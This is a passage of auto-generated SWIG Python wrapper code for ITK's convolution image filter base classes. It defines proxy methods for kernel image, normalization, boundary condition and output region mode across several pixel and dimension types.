"""GetKernelImage(itkConvolutionImageFilterBaseISS2ISS2 self) -> itkImageSS2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetKernelImage(self)
def SetNormalize(self, _arg: 'bool const') -> "void":
"""SetNormalize(itkConvolutionImageFilterBaseISS2ISS2 self, bool const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetNormalize(self, _arg)
def GetNormalize(self) -> "bool":
"""GetNormalize(itkConvolutionImageFilterBaseISS2ISS2 self) -> bool"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetNormalize(self)
def NormalizeOn(self) -> "void":
"""NormalizeOn(itkConvolutionImageFilterBaseISS2ISS2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_NormalizeOn(self)
def NormalizeOff(self) -> "void":
"""NormalizeOff(itkConvolutionImageFilterBaseISS2ISS2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_NormalizeOff(self)
SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SAME
VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_VALID
def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseISS2ISS2::OutputRegionModeType const') -> "void":
"""SetOutputRegionMode(itkConvolutionImageFilterBaseISS2ISS2 self, itkConvolutionImageFilterBaseISS2ISS2::OutputRegionModeType const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetOutputRegionMode(self, _arg)
def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseISS2ISS2::OutputRegionModeType":
"""GetOutputRegionMode(itkConvolutionImageFilterBaseISS2ISS2 self) -> itkConvolutionImageFilterBaseISS2ISS2::OutputRegionModeType"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetOutputRegionMode(self)
def SetOutputRegionModeToSame(self) -> "void":
"""SetOutputRegionModeToSame(itkConvolutionImageFilterBaseISS2ISS2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetOutputRegionModeToSame(self)
def SetOutputRegionModeToValid(self) -> "void":
"""SetOutputRegionModeToValid(itkConvolutionImageFilterBaseISS2ISS2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetOutputRegionModeToValid(self)
__swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseISS2ISS2
def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseISS2ISS2 *":
"""cast(itkLightObject obj) -> itkConvolutionImageFilterBaseISS2ISS2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_cast(obj)
cast = staticmethod(cast)
def New(*args, **kargs):
"""New() -> itkConvolutionImageFilterBaseISS2ISS2
Create a new object of the class itkConvolutionImageFilterBaseISS2ISS2 and set the input and the parameters if some
named or non-named arguments are passed to that method.
New() tries to assign all the non named parameters to the input of the new objects - the
first non named parameter in the first input, etc.
The named parameters are used by calling the method with the same name prefixed by 'Set'.
Ex:
itkConvolutionImageFilterBaseISS2ISS2.New( reader, Threshold=10 )
is (most of the time) equivalent to:
obj = itkConvolutionImageFilterBaseISS2ISS2.New()
obj.SetInput( 0, reader.GetOutput() )
obj.SetThreshold( 10 )
"""
obj = itkConvolutionImageFilterBaseISS2ISS2.__New_orig__()
import itkTemplate
itkTemplate.New(obj, *args, **kargs)
return obj
New = staticmethod(New)
itkConvolutionImageFilterBaseISS2ISS2.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetBoundaryCondition, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetBoundaryCondition, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetKernelImage, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetKernelImage, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetNormalize, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetNormalize, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_NormalizeOn, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_NormalizeOff, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetOutputRegionMode, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetOutputRegionMode, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_swigregister
itkConvolutionImageFilterBaseISS2ISS2_swigregister(itkConvolutionImageFilterBaseISS2ISS2)
def itkConvolutionImageFilterBaseISS2ISS2_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseISS2ISS2 *":
"""itkConvolutionImageFilterBaseISS2ISS2_cast(itkLightObject obj) -> itkConvolutionImageFilterBaseISS2ISS2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_cast(obj)
class itkConvolutionImageFilterBaseISS3ISS3(itkImageToImageFilterAPython.itkImageToImageFilterISS3ISS3):
"""Proxy of C++ itkConvolutionImageFilterBaseISS3ISS3 class."""
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionISS3') -> "void":
"""SetBoundaryCondition(itkConvolutionImageFilterBaseISS3ISS3 self, itkImageBoundaryConditionISS3 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetBoundaryCondition(self, _arg)
def GetBoundaryCondition(self) -> "itkImageBoundaryConditionISS3 *":
"""GetBoundaryCondition(itkConvolutionImageFilterBaseISS3ISS3 self) -> itkImageBoundaryConditionISS3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetBoundaryCondition(self)
def SetKernelImage(self, _arg: 'itkImageSS3') -> "void":
"""SetKernelImage(itkConvolutionImageFilterBaseISS3ISS3 self, itkImageSS3 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetKernelImage(self, _arg)
def GetKernelImage(self) -> "itkImageSS3 const *":
"""GetKernelImage(itkConvolutionImageFilterBaseISS3ISS3 self) -> itkImageSS3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetKernelImage(self)
def SetNormalize(self, _arg: 'bool const') -> "void":
"""SetNormalize(itkConvolutionImageFilterBaseISS3ISS3 self, bool const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetNormalize(self, _arg)
def GetNormalize(self) -> "bool":
"""GetNormalize(itkConvolutionImageFilterBaseISS3ISS3 self) -> bool"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetNormalize(self)
def NormalizeOn(self) -> "void":
"""NormalizeOn(itkConvolutionImageFilterBaseISS3ISS3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_NormalizeOn(self)
def NormalizeOff(self) -> "void":
"""NormalizeOff(itkConvolutionImageFilterBaseISS3ISS3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_NormalizeOff(self)
SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SAME
VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_VALID
def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseISS3ISS3::OutputRegionModeType const') -> "void":
"""SetOutputRegionMode(itkConvolutionImageFilterBaseISS3ISS3 self, itkConvolutionImageFilterBaseISS3ISS3::OutputRegionModeType const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetOutputRegionMode(self, _arg)
def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseISS3ISS3::OutputRegionModeType":
"""GetOutputRegionMode(itkConvolutionImageFilterBaseISS3ISS3 self) -> itkConvolutionImageFilterBaseISS3ISS3::OutputRegionModeType"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetOutputRegionMode(self)
def SetOutputRegionModeToSame(self) -> "void":
"""SetOutputRegionModeToSame(itkConvolutionImageFilterBaseISS3ISS3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetOutputRegionModeToSame(self)
def SetOutputRegionModeToValid(self) -> "void":
"""SetOutputRegionModeToValid(itkConvolutionImageFilterBaseISS3ISS3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetOutputRegionModeToValid(self)
__swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseISS3ISS3
def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseISS3ISS3 *":
"""cast(itkLightObject obj) -> itkConvolutionImageFilterBaseISS3ISS3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_cast(obj)
cast = staticmethod(cast)
def New(*args, **kargs):
"""New() -> itkConvolutionImageFilterBaseISS3ISS3
Create a new object of the class itkConvolutionImageFilterBaseISS3ISS3 and set the input and the parameters if some
named or non-named arguments are passed to that method.
New() tries to assign all the non named parameters to the input of the new objects - the
first non named parameter in the first input, etc.
The named parameters are used by calling the method with the same name prefixed by 'Set'.
Ex:
itkConvolutionImageFilterBaseISS3ISS3.New( reader, Threshold=10 )
is (most of the time) equivalent to:
obj = itkConvolutionImageFilterBaseISS3ISS3.New()
obj.SetInput( 0, reader.GetOutput() )
obj.SetThreshold( 10 )
"""
obj = itkConvolutionImageFilterBaseISS3ISS3.__New_orig__()
import itkTemplate
itkTemplate.New(obj, *args, **kargs)
return obj
New = staticmethod(New)
itkConvolutionImageFilterBaseISS3ISS3.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetBoundaryCondition, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetBoundaryCondition, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetKernelImage, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetKernelImage, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetNormalize, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetNormalize, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_NormalizeOn, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_NormalizeOff, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetOutputRegionMode, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetOutputRegionMode, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_swigregister
itkConvolutionImageFilterBaseISS3ISS3_swigregister(itkConvolutionImageFilterBaseISS3ISS3)
def itkConvolutionImageFilterBaseISS3ISS3_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseISS3ISS3 *":
"""itkConvolutionImageFilterBaseISS3ISS3_cast(itkLightObject obj) -> itkConvolutionImageFilterBaseISS3ISS3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_cast(obj)
class itkConvolutionImageFilterBaseIUC2IUC2(itkImageToImageFilterAPython.itkImageToImageFilterIUC2IUC2):
"""Proxy of C++ itkConvolutionImageFilterBaseIUC2IUC2 class."""
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionIUC2') -> "void":
"""SetBoundaryCondition(itkConvolutionImageFilterBaseIUC2IUC2 self, itkImageBoundaryConditionIUC2 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetBoundaryCondition(self, _arg)
def GetBoundaryCondition(self) -> "itkImageBoundaryConditionIUC2 *":
"""GetBoundaryCondition(itkConvolutionImageFilterBaseIUC2IUC2 self) -> itkImageBoundaryConditionIUC2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetBoundaryCondition(self)
def SetKernelImage(self, _arg: 'itkImageUC2') -> "void":
"""SetKernelImage(itkConvolutionImageFilterBaseIUC2IUC2 self, itkImageUC2 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetKernelImage(self, _arg)
def GetKernelImage(self) -> "itkImageUC2 const *":
"""GetKernelImage(itkConvolutionImageFilterBaseIUC2IUC2 self) -> itkImageUC2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetKernelImage(self)
def SetNormalize(self, _arg: 'bool const') -> "void":
"""SetNormalize(itkConvolutionImageFilterBaseIUC2IUC2 self, bool const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetNormalize(self, _arg)
def GetNormalize(self) -> "bool":
"""GetNormalize(itkConvolutionImageFilterBaseIUC2IUC2 self) -> bool"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetNormalize(self)
def NormalizeOn(self) -> "void":
"""NormalizeOn(itkConvolutionImageFilterBaseIUC2IUC2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_NormalizeOn(self)
def NormalizeOff(self) -> "void":
"""NormalizeOff(itkConvolutionImageFilterBaseIUC2IUC2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_NormalizeOff(self)
SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SAME
VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_VALID
def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseIUC2IUC2::OutputRegionModeType const') -> "void":
"""SetOutputRegionMode(itkConvolutionImageFilterBaseIUC2IUC2 self, itkConvolutionImageFilterBaseIUC2IUC2::OutputRegionModeType const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetOutputRegionMode(self, _arg)
def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseIUC2IUC2::OutputRegionModeType":
"""GetOutputRegionMode(itkConvolutionImageFilterBaseIUC2IUC2 self) -> itkConvolutionImageFilterBaseIUC2IUC2::OutputRegionModeType"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetOutputRegionMode(self)
def SetOutputRegionModeToSame(self) -> "void":
"""SetOutputRegionModeToSame(itkConvolutionImageFilterBaseIUC2IUC2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetOutputRegionModeToSame(self)
def SetOutputRegionModeToValid(self) -> "void":
"""SetOutputRegionModeToValid(itkConvolutionImageFilterBaseIUC2IUC2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetOutputRegionModeToValid(self)
__swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseIUC2IUC2
def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUC2IUC2 *":
"""cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIUC2IUC2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_cast(obj)
cast = staticmethod(cast)
def New(*args, **kargs):
"""New() -> itkConvolutionImageFilterBaseIUC2IUC2
Create a new object of the class itkConvolutionImageFilterBaseIUC2IUC2 and set the input and the parameters if some
named or non-named arguments are passed to that method.
New() tries to assign all the non named parameters to the input of the new objects - the
first non named parameter in the first input, etc.
The named parameters are used by calling the method with the same name prefixed by 'Set'.
Ex:
itkConvolutionImageFilterBaseIUC2IUC2.New( reader, Threshold=10 )
is (most of the time) equivalent to:
obj = itkConvolutionImageFilterBaseIUC2IUC2.New()
obj.SetInput( 0, reader.GetOutput() )
obj.SetThreshold( 10 )
"""
obj = itkConvolutionImageFilterBaseIUC2IUC2.__New_orig__()
import itkTemplate
itkTemplate.New(obj, *args, **kargs)
return obj
New = staticmethod(New)
itkConvolutionImageFilterBaseIUC2IUC2.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetBoundaryCondition, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetBoundaryCondition, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetKernelImage, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetKernelImage, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetNormalize, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetNormalize, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_NormalizeOn, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_NormalizeOff, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetOutputRegionMode, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetOutputRegionMode, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_swigregister
itkConvolutionImageFilterBaseIUC2IUC2_swigregister(itkConvolutionImageFilterBaseIUC2IUC2)
def itkConvolutionImageFilterBaseIUC2IUC2_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUC2IUC2 *":
"""itkConvolutionImageFilterBaseIUC2IUC2_cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIUC2IUC2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_cast(obj)
class itkConvolutionImageFilterBaseIUC3IUC3(itkImageToImageFilterAPython.itkImageToImageFilterIUC3IUC3):
"""Proxy of C++ itkConvolutionImageFilterBaseIUC3IUC3 class."""
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionIUC3') -> "void":
"""SetBoundaryCondition(itkConvolutionImageFilterBaseIUC3IUC3 self, itkImageBoundaryConditionIUC3 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetBoundaryCondition(self, _arg)
def GetBoundaryCondition(self) -> "itkImageBoundaryConditionIUC3 *":
"""GetBoundaryCondition(itkConvolutionImageFilterBaseIUC3IUC3 self) -> itkImageBoundaryConditionIUC3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetBoundaryCondition(self)
def SetKernelImage(self, _arg: 'itkImageUC3') -> "void":
"""SetKernelImage(itkConvolutionImageFilterBaseIUC3IUC3 self, itkImageUC3 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetKernelImage(self, _arg)
def GetKernelImage(self) -> "itkImageUC3 const *":
"""GetKernelImage(itkConvolutionImageFilterBaseIUC3IUC3 self) -> itkImageUC3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetKernelImage(self)
def SetNormalize(self, _arg: 'bool const') -> "void":
"""SetNormalize(itkConvolutionImageFilterBaseIUC3IUC3 self, bool const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetNormalize(self, _arg)
def GetNormalize(self) -> "bool":
"""GetNormalize(itkConvolutionImageFilterBaseIUC3IUC3 self) -> bool"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetNormalize(self)
def NormalizeOn(self) -> "void":
"""NormalizeOn(itkConvolutionImageFilterBaseIUC3IUC3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_NormalizeOn(self)
def NormalizeOff(self) -> "void":
"""NormalizeOff(itkConvolutionImageFilterBaseIUC3IUC3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_NormalizeOff(self)
SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SAME
VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_VALID
def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseIUC3IUC3::OutputRegionModeType const') -> "void":
"""SetOutputRegionMode(itkConvolutionImageFilterBaseIUC3IUC3 self, itkConvolutionImageFilterBaseIUC3IUC3::OutputRegionModeType const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetOutputRegionMode(self, _arg)
def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseIUC3IUC3::OutputRegionModeType":
"""GetOutputRegionMode(itkConvolutionImageFilterBaseIUC3IUC3 self) -> itkConvolutionImageFilterBaseIUC3IUC3::OutputRegionModeType"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetOutputRegionMode(self)
def SetOutputRegionModeToSame(self) -> "void":
"""SetOutputRegionModeToSame(itkConvolutionImageFilterBaseIUC3IUC3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetOutputRegionModeToSame(self)
def SetOutputRegionModeToValid(self) -> "void":
"""SetOutputRegionModeToValid(itkConvolutionImageFilterBaseIUC3IUC3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetOutputRegionModeToValid(self)
__swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseIUC3IUC3
def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUC3IUC3 *":
"""cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIUC3IUC3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_cast(obj)
cast = staticmethod(cast)
def New(*args, **kargs):
"""New() -> itkConvolutionImageFilterBaseIUC3IUC3
Create a new object of the class itkConvolutionImageFilterBaseIUC3IUC3 and set the input and the parameters if some
named or non-named arguments are passed to that method.
New() tries to assign all the non named parameters to the input of the new objects - the
first non named parameter in the first input, etc.
The named parameters are used by calling the method with the same name prefixed by 'Set'.
Ex:
itkConvolutionImageFilterBaseIUC3IUC3.New( reader, Threshold=10 )
is (most of the time) equivalent to:
obj = itkConvolutionImageFilterBaseIUC3IUC3.New()
obj.SetInput( 0, reader.GetOutput() )
obj.SetThreshold( 10 )
"""
obj = itkConvolutionImageFilterBaseIUC3IUC3.__New_orig__()
import itkTemplate
itkTemplate.New(obj, *args, **kargs)
return obj
New = staticmethod(New)
itkConvolutionImageFilterBaseIUC3IUC3.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetBoundaryCondition, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetBoundaryCondition, None, itkConvolutionImageFilterBaseIUC3IUC3)
